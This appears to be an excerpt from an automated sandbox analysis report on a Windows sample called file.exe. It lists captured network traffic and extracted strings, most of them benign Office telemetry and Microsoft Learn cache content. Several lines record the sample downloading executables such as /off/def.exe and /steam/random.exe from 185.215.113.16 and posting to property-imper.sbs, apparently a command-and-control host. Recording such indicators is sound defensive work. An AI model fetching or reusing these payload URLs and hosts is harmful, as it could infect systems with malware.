              Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
              Source: chromecache_118.6.dr, chromecache_106.6.drString found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
              Source: chromecache_118.6.dr, chromecache_106.6.drString found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
              Source: chromecache_118.6.dr, chromecache_106.6.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
              Source: chromecache_118.6.dr, chromecache_106.6.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
              Source: chromecache_118.6.dr, chromecache_106.6.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)
              Source: global trafficDNS traffic detected: DNS query: property-imper.sbs
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
              Source: global trafficDNS traffic detected: DNS query: mdec.nelreports.net
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
              Source: file.exe, 00000000.00000003.2458601624.0000000001631000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2426074629.000000000161C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2426101193.000000000162A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
              Source: file.exe, 00000000.00000003.2426074629.000000000161C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2426101193.000000000162A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/i
              Source: file.exe, 00000000.00000002.2547545469.00000000015B9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2426074629.000000000161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
              Source: file.exe, 00000000.00000003.2426074629.000000000161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exeb
              Source: file.exe, 00000000.00000002.2546189220.0000000000CFA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exepleWebKit/537.36
              Source: file.exe, 00000000.00000002.2547545469.00000000015B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exes
              Source: file.exe, 00000000.00000002.2547545469.00000000015B9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2363430838.0000000001631000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2363642766.0000000001631000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2426074629.000000000161C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2426101193.000000000162A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
              Source: file.exe, 00000000.00000003.2183367881.0000000005D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: file.exe, 00000000.00000003.2183367881.0000000005D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: file.exe, 00000000.00000003.2183367881.0000000005D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: file.exe, 00000000.00000003.2183367881.0000000005D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: file.exe, 00000000.00000003.2183367881.0000000005D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: file.exe, 00000000.00000003.2183367881.0000000005D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: file.exe, 00000000.00000003.2183367881.0000000005D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: file.exe, 00000000.00000003.2183367881.0000000005D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: file.exe, 00000000.00000003.2183367881.0000000005D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: chromecache_118.6.dr, chromecache_106.6.drString found in binary or memory: http://polymer.github.io/AUTHORS.txt
              Source: chromecache_118.6.dr, chromecache_106.6.drString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
              Source: chromecache_118.6.dr, chromecache_106.6.drString found in binary or memory: http://polymer.github.io/LICENSE.txt
              Source: chromecache_118.6.dr, chromecache_106.6.drString found in binary or memory: http://polymer.github.io/PATENTS.txt
              Source: chromecache_126.6.drString found in binary or memory: http://schema.org/Organization
              Source: file.exe, 00000000.00000003.2183367881.0000000005D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: file.exe, 00000000.00000003.2183367881.0000000005D69000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: file.exe, 00000000.00000003.2117386035.0000000005D78000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2117288244.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2117465467.0000000005D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: chromecache_118.6.dr, chromecache_106.6.drString found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
              Source: chromecache_118.6.dr, chromecache_106.6.drString found in binary or memory: https://aka.ms/certhelp
              Source: chromecache_126.6.dr, chromecache_127.6.dr, chromecache_90.6.drString found in binary or memory: https://aka.ms/feedback/report?space=61
              Source: chromecache_118.6.dr, chromecache_106.6.drString found in binary or memory: https://aka.ms/msignite_docs_banner
              Source: chromecache_118.6.dr, chromecache_106.6.drString found in binary or memory: https://aka.ms/pshelpmechoose
              Source: chromecache_126.6.drString found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
              Source: chromecache_126.6.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
              Source: chromecache_126.6.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
              Source: chromecache_118.6.dr, chromecache_106.6.drString found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
              Source: file.exe, 00000000.00000003.2117386035.0000000005D78000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2117288244.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2117465467.0000000005D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: file.exe, 00000000.00000003.2117386035.0000000005D78000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2117288244.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2117465467.0000000005D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
